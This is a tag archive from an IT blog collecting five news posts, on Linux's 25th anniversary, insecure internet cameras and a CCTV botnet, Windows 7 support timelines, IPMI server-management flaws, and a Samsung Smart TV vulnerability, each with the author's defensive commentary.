Tag Archive for Linux

Linux Turns 25

Linux Turns 25Linus Torvalds released the first Linux operating system kernel on Oct. 5, 1991. On Oct. 6, 1991, Torvalds began arguing with volunteer developers who would go on to make Linux an open-source powerhouse and eventually a household name. Today the Linux community is upwards of 86 million users strong.

Linux Turns 25As part of celebrations to mark Linux’s 25th birthday the Linux Foundation has published its annual Linux Kernel Development Report (PDF reg required). According to the Register, the report concludes that Linux is in great shape, “There may be no other examples of such a large, common resource being supported by such a large group of independent actors in such a collaborative way.”

The independent actors have a lot to collaborate on. The report notes that the first versions of the Linux kernel comprised about 10,000 lines of code. Now it’s nearing 22 million and growing at a rate of 4,600 lines a day.

Wall StreetWhile Linux may have started out as a hobby OS, that changed in the early 2000s. At the turn of the century, Wall Street banks demanded Linux support for their enterprise application servers says Tech News World.

“That was a moment that broke down resistance to Linux in the big IT vendors like BEA, IBM, and Oracle (ORCL). That hole in the dam was the start of a flood,” said Cloud Foundry CEO Sam Ramji. “Today Linux is the home of operating system innovation.

Linux user and open source advocateAporeto Virtualization Expert Stefano Stabellini, who has been a Linux user and open source advocate since the 1990s explained the transition. “… back when I started with Linux in the ’90s … [companies] did not understand it. They thought that open source was unsustainable, and Linux was niche and hobbyist.” He says that now everything has changed. Every company has an open source strategy now. “Microsoft (MSFT) was the biggest foe and now is a strong ally. Linux is the most widely adopted operating system of all times.

Dice points out that the most active contributors to the growth of Linux have included (in descending order) Intel (INTC), Red Hat, Linaro, Samsung (005930), SUSE, IBM (IBM), and various corporate consultants. Google (GOOG), AMD (AMD), and Texas Instruments (TXN) also ranked in the top 15.

rb-

So my first pass at Linux was Red Hat Linux 5.0. when Novell bought into Linux. Yeap I was a Novell CNE 5 way back in the day.

The last couple of projects I have been involved with have used Linux and not Windows, CMS, IVR, PAFW’s, and storage.

Related articles

 

Ralph Bach has been in IT long enough to know better and has blogged from his Bach Seat about IT, careers, and anything else that catches his attention since 2005. You can follow him on LinkedInFacebook, and Twitter. Email the Bach Seat here.

Security Cam Concerns in Ann Arbor

Security Cam Concerns in Ann ArborNext time you are in Ann Arbor to get a bite to eat at Zingerman’s or attend a U of M football game at Michigan stadium someone may be watching you. NetworkWorld, says Ann Arbor is one of the top U.S. cities with the most unsecured security cameras. In fact, Ann Arbor ranks seventh nationally.

The report’s author, security firm Protection 1, analyzed the data from Insecam. Inseacam identifies open security cameras and Protection 1 estimates there are over 11,000 open security cameras on the Internet in the U.S. Protection 1 identified the cities with the most cameras that can be viewed by anyone online. The top 10 cities with unsecured security cameras are:

  1. open security camerasWalnut Creek, CA – 89.69 / 100,000 residents
  2. Richardson, TX – 72.74 / 100,000 residents
  3. Torrance, CA – 72.55 / 100,000 residents
  4. Newark, NJ – 38.07 / 100,000 residents
  5. Rancho Cucamonga, CA – 36.76 / 100,000 residents
  6. Corvallis, OR – 37.98 / 100,000 residents
  7. Ann Arbor, MI – 34.18 / 100,000 residents
  8. Orlando, FL – 34.05 / 100,000 residents
  9. Eau Claire, WI – 22.21 / 100,000 residents
  10. Albany, NY – 20.32 / 100,000 residents

using the manufacturer's default passwordOpen security cameras connect to the Internet via Wi-Fi or a cable. They have no password protection or are using the manufacturer’s default password. Malicious people and governments can record or broadcast our lives from unprotected open security cameras. Open cameras are also vulnerable attacks that can turn them into bots.

From a privacy perspective, the most worrisome finding is that 15% of the open cameras are in Americans’ homes. Anyone can watch these cameras if the default password is not changed to a unique password to lock down the camera.

Besides being spied on from the web, open cameras can be exploited by criminals. Cyber-criminals can force online cameras to attack other things on the Internet as part of a DDoS attack.

distributed denial-of-service (DDoS)A DDoS attack against a jewelry shop website led to the discovery of a CCTV-based botnet. A distributed denial-of-service (DDoS) attack is one in which a multitude of compromised systems attack a single target, thereby causing a denial of service for users of the targeted system. TargetTech says the flood of incoming messages to the target system essentially forces it to shut down, thereby denying service to the system to legitimate users.

Help Net Security reports that Sucuri researchers discovered the jewelry site was being attacked by a CCTV botnet made up of 25,000+ cameras from around the globe. The website was first attacked by a layer 7 attack (HTTP Flood) at 35,000 HTTP requests per second and then, when those efforts were thwarted, with 50,000 HTTP requests per second.

Sucuri researchers discovered that all the attacking IP addresses had a similar default page with the ‘DVR Components’ title. After digging some more, they found that all these devices are BusyBox based. Busybox is a GNU-based software that aims to be the smallest and simplest correct implementation of the standard Linux command-line tools.

CCTV botnet made up of 25,000+ cameras from around the globeThe compromised CCTV cameras were located around the globe:

  • 24% originated from Taiwan,
  • 12% United States,
  • 9% Indonesia,
  • 8% Mexico,
  • and elsewhere.

rb-

Unless something is done, security flaws, misconfiguration, and ignorance about the dangers of connecting unsecured devices to the IoT will keep these botnets functioning well into the future.

block or absorb malicious trafficTo protect your website from botnets and DDoS, you need to be able to block or absorb malicious traffic. Firms should talk to their hosting provider about DDoS attack protection. Can they route incoming malicious traffic through distributed caching to help filter out malicious traffic — reducing the strain on existing web servers. If not find a reputable third-party service that can help filter out malicious traffic.

DDoS defense services require a paid subscription, but often cost less than scaling up your own server capacity to deal with a DDoS attack.

Arbor Networks is one firm that provides services and devices to defend against DDoS.

Google has launched Project Shield, to use Google’s infrastructure to support free expression online by helping independent sites mitigate DDoS attack traffic.

Related articles

 

Ralph Bach has been in IT long enough to know better and has blogged from his Bach Seat about IT, careers, and anything else that catches his attention since 2005. You can follow him on LinkedInFacebook, and Twitter. Email the Bach Seat here.

Windows 7 Reaches Middle Age

Windows 7 Reaches Middle AgeNow that you have almost eliminated Microsoft (MSFT) Windows XP from your network and settled on Windows 7 it should be time to catch your breath. But NOOO!! Windows 7 has reached the end of mainstream support.  That’s right we are already 5 years into the Windows 7 era. Repeat after me… Windows 7 still has five years left … Windows 7 still has five years left … Windows 7 still has five years left.

MMicrosoft Windows 7 logoicrosoft commits to 10 years of security fixes and 5 years of feature enhancements and bug fixes for each major OS release. Windows 7 has moved from mainstream support – free help for everyone – to extended support, which means Microsoft will charge for help with the software. That will end in 2020 when Microsoft turns out the lights on Windows 7 for good.

The recent techno-flops from the boys and girls in Redmond, Vista, and Windows 8 have taught enterprises to plan for a new desktop OS every other release. This puts businesses in a bind. MSFT’s track record prevents forward-looking firms from organically growing their desktop fleet into the next cycle. There are those that argue that until Microsoft separates consumer from commercial desktops, Microsoft commercial customers will continue to skip one or more iterations of Windows, their only real answer to the high costs and disruption of upgrading.

Gregg KeizerMirosoft update cycle at ComputerWorld cites research from Gartner (IT) which prognosticates that many enterprises cannot change their processes. Many organizations will go through the same machinations they did with XP. Or maybe even balk at dumping Windows 7 at the same pace as the venerable Windows XP, making things worse. Michael Silver of Gartner told ComputerWorld that having a plan could help organizations avoid a repeat of XP’s expensive end-of-support scramble. Gartner believes that the same EOL mad-scramble we saw with XP will occur again when time is up on Windows 7. Mr. Silver claims:

[A repeat of Windows XP] is certainly likely to happen … One of the big differences that’s been under-considered is that because Vista took five years to come out [after XP], there were eight years between XP and Windows 7. So Windows XP felt pretty old. … Windows 7 won’t feel that old to people…” 

Microsoft Windows 10 logoMr. Keizer argues that the failure of Windows 8 to win enterprise hearts and minds has created an oddity: Even though Windows 7 has made middle age, Microsoft continues to let OEMs sell PCs running the Windows 7 business edition.  Microsoft has yet to name an end date for OEM sales of machines powered by Windows 7 Professional. But because it has promised a 12-month notice, those PCs can still be sold at least until early January 2016, when the OS has but four years of life left.

But if you are just finishing your last migration, then you don’t have all that much time to start planning the next one.

rb-

If you don’t like the Redmond hamster wheel, consider your alternatives. Sophos compares the Windows upgrade schedule to some other options. 10 years might be the best option out there. For example:

  • Apple’s (AAPL) OS X is supported for mystery years,
  • Apple’s mobile iOS is supported for mystery years (3?)
  • Android seems to leave it up to you, but don’t expect Google (GOOG) to commit to securing it.
  • Ubuntu LTS is supported for around 5 years, and
  • Red Hat Enterprise 13 years (with extended support).
Related articles

 

Ralph Bach has been in IT long enough to know better and has blogged from his Bach Seat about IT, careers, and anything else that catches his attention since 2005. You can follow him on LinkedInFacebook, and Twitter. Email the Bach Seat here.

Server Management Security Hole

Server Management Security HoleDan Farmer, security researcher and creator of the SATAN vulnerability scanner, teamed up with HD Moore, chief research officer at Rapid7 and lead architect of the Metasploit penetration testing framework found 230,000 publicly accessible Out-Of-Band management interfaces on the Internet. Many of these systems were running software that dates back to 2001.

Out-Of-Band server management

Out-Of-Band (OOB) managementAccording to PCWorld, the Out-Of-Band (OOB) management interfaces expose servers to the Internet through microcontrollers embedded into the motherboard that run independently of the main OS and provide monitoring and administration functions. These microcontrollers are called Baseboard Management Controllers (BMCs). BMC’s are part of the Intelligent Platform Management Interface (IPMI), a standardized interface made up of a variety of sensors and controllers that allow administrators to manage servers remotely when they’re shut down or unresponsive, but are still connected to the power supply.

BMCs are embedded systems that have their own firmware—usually based on Linux. It’s an OS-agnostic and pervasive protocol. Initially developed by Intel (INTC), Dell (DELL), HP (HPQ), and other large equipment manufacturers. It was designed to help manage OOB or Lights-Out communication.

Rebranded by OEM manufacturers

Lights-Out communicationPure IPMI is usually implemented as a network service that runs on UDP port 623. It can either piggyback on the server’s network port or may use a dedicated Ethernet port. Vendors take IPMI as a base and add on a variety of services like mail, SNMP, and Web GUIs, and then rebrand the new package:

  • Dell has iDRAC,
  • Hewlett Packard iLO,
  • IBM (IBM) IMM2

It’s also used as the engine for higher-level protocols. Some of the protocols are put out by the DMTF (WBEM, CIM, etc.) the OpenStack Foundation, and others. IPMI is particularly popular for large-scale provisioning, roll-outs, remote troubleshooting, and console access according to the research paper.

Parasitic oversight

complete control and oversight on of the serverThe parasitic BMC has near-complete control and oversight of the server it rides upon. It can control the server’s including its memory, networking, and storage media. It can not be truly turned off. Instead, it runs continuously unless the power cord is completely pulled. An owner may only temporarily disable outside interaction unless you take a hammer to the motherboard.

Security researchers have warned in the past that most IPMI implementations suffer from architectural insecurities and other vulnerabilities/ These can be exploited to gain administrative access to BMCs. If attackers control the BMC they can mount attacks against the server’s OS as well as other servers from the same management group.

Dan Farmer stated in his recent paper Sold Down the River (PDF).

For over a decade major server manufacturers have harmed their customers by shipping servers that are vulnerable by default, with a management protocol that is insecure by design, and with little to no documentation about how to make things better … These vendors have not only gone out of their way to make their offerings difficult to understand or audit but also neglected to supply any substantial defense tools or helpful security controls.

Old BMC software

Remote managementMr. Farmer and Mr. Moore ran scans on the Internet in May 2014 and identified 230,000 publicly accessible BMCs. A deeper analysis of the at-risk systems revealed:

  • 46.8% of them were running IPMI version 1.5, which dates back to 2001,
  • 53.2% were running IPMI version 2.0, which was released in 2004.

The researchers reported that nearly all the systems running IPMI v1.5 were configured so that all accounts could be logged into without authentication. … you can login to pretty much any older IPMI system without an account or a password.” Mr. Farmer explains this set-up can grant an attacker privileged access, “… in most cases, they grant administrative access, and even when they don’t the mere ability to execute any kind of commands without authentication is a bad thing.

architectural insecurities that can be exploitedThe team found that IPMI v.2.0, which includes cryptographic protection has its own security issues. For example, the first cipher option, known as cipher zero, provides no authentication, integrity, or confidentiality protection, Farmer said. A valid user name is required for logging in, without a password. The researcher found that around 60% of the publicly accessible BMCs running IPMI version 2 had this vulnerability.

Server management issues in IPMI 2.0

Another serious issue introduced by IPMI 2.0 stems from its RAKP key-exchange protocol that’s used when negotiating secure connections. The protocol allows an anonymous user to obtain password hashes associated with any accounts on the BMC, as long as the account names are known.

“This is an astonishingly bad design, because it allows an attacker to grab your password’s hash and do offline password cracking with as many resources as desired to throw at the problem,” Farmer said.

The analysis showed that 83% of the identified BMCs were vulnerable to this issue. A test with brute-force password guessing application John the Ripper, using a modest 4.7 million-word dictionary successfully cracked 30% of the BMC passwords. Farmer calculated that between 72.8 and 92.5% depending on password cracking success rate, of BMCs running IPMI 2.0 had authentication issues and were vulnerable to unauthorized access.

Canary in the coal mine

While a quarter of a million BMCs is only a tiny sliver of the total computing power in the world, it’s still an important indicator as a kind of canary in the coal mine,” Mr. Farmer warns. He predicts that BMCs behind corporate firewalls share the same issues. He said. “While management systems are often not directly assailable from the outside they’re often left open once the outer thin hard candy shell of an organization is breached.

The research paper includes recommendations for server administrators on how to mitigate some of the identified issues and better secure their BMCs. But the researcher concludes that ultimately the problem of insecure IPMI implementations will linger on for a long time. Mr. Farmer concludes with a rant:

Many of these problems would have been easy to fix if the IPMI protocol had undergone a serious security review or if the developers of modern BMCs had spent a little more effort in hardening their products and giving their customers the tools to secure their servers … At this point, it is far too late to effect meaningful change. The sheer number of servers that include a vulnerable BMC will guarantee that IPMI vulnerabilities and insecure configurations will continue to be a problem for years to come.

rb-
They told us so, about a year ago.

Defense-in-depth, block UDP port 623 at the perimeter – yes all of them, on the end-points, you are using personal firewalls?

Disable or remove the default vendor user names and pick a strong UID and PWD

Least privilege, the researchers warn that anyone who has administrative privileges on a BMC’s server has administrative control over it and may disable or enable IPMI, add or remove accounts, change the IP address, etc., etc.–all without any authentication to the BMC.

Related articles

 

Ralph Bach has been in IT long enough to know better and has blogged from his Bach Seat about IT, careers, and anything else that catches his attention since 2005. You can follow him on LinkedInFacebook, and Twitter. Email the Bach Seat here.

Smart TVs Dumb Security

Smart TVs Dumb SecurityWhen a device gets connected to the web without any security it leaves the users vulnerable. This is a trend as the Internet of Things evolves. In this case, Samsung Smart TVs seem to have no security, a dumb TV. Dailywireless.org reports that 40% of Americans have connected their TV to the Internet.

Samsung Smart TVAt the same time, The Security Ledger is reporting that a “Security Hole in Samsung Smart TVs Could Allow Remote Spying.” The Malta-based firm ReVuln, says it has uncovered a remotely exploitable security hole in Samsung Smart TVs. If left unpatched, the vulnerability could allow hackers to make off with owners’ social media credentials. Attackers could also spy on those watching the TV using compatible video cameras and microphones.

ReVuln is a security research firm that offers information on security holes it discovers only to subscribers. However, it did confirm the previously unknown (“zero-day”) hole with Security Ledger. The zero-day affects Samsung Electronics Co. (005930) Smart TVs running the latest version of the company’s Linux-based firmware. It could give an attacker the ability to get access to any file on the remote device, As vulnerable are external devices (such as USB drives) connected to the TV.

In an Orwellian twist, the hole could be used to use cameras and microphones attached to the Smart TVs. Granting remote attackers the ability to spy on those viewing a compromised set. Luigi Auriemma of ReVuln told ComputerWorld via email, “If the attacker has full control of the TV … then he can do everything like stealing accounts to the worst scenario of using the integrated webcam and microphone to ‘watch’ the victim.

Dumb TVSecurity Ledger says that the Smart TVs offer no native security features, such as a firewall, user authentication, or application whitelisting. More critically: there is no independent software update capability, Which means that, barring a firmware update from Samsung, the exploitable hole can’t be patched without “voiding the device’s warranty and using other exploits,” ReVuln said.

The company posted a video of an attack on a Samsung TV LED 3D Smart TV online. It shows an attacker gaining shell access to the TV. Copying the contents of its hard drive to an external device and mounting them on a local drive. This gave them access to photos, documents, and other content. ReVuln said an attacker would also be able to lift credentials from any social networks or other online services accessed from the device.

rb-

DIY securityThere is no patch for people. Until there is, Smart TV users will have to wait for Samsung to fix this huge security hole or fix it for themselves and risk voiding their warranty. Smart TV with a complete lack of security features, Smart TV Dumb Security.

Related articles

 

Ralph Bach has been in IT long enough to know better and has blogged from his Bach Seat about IT, careers, and anything else that catches his attention since 2005. You can follow him on LinkedInFacebook, and Twitter. Email the Bach Seat here.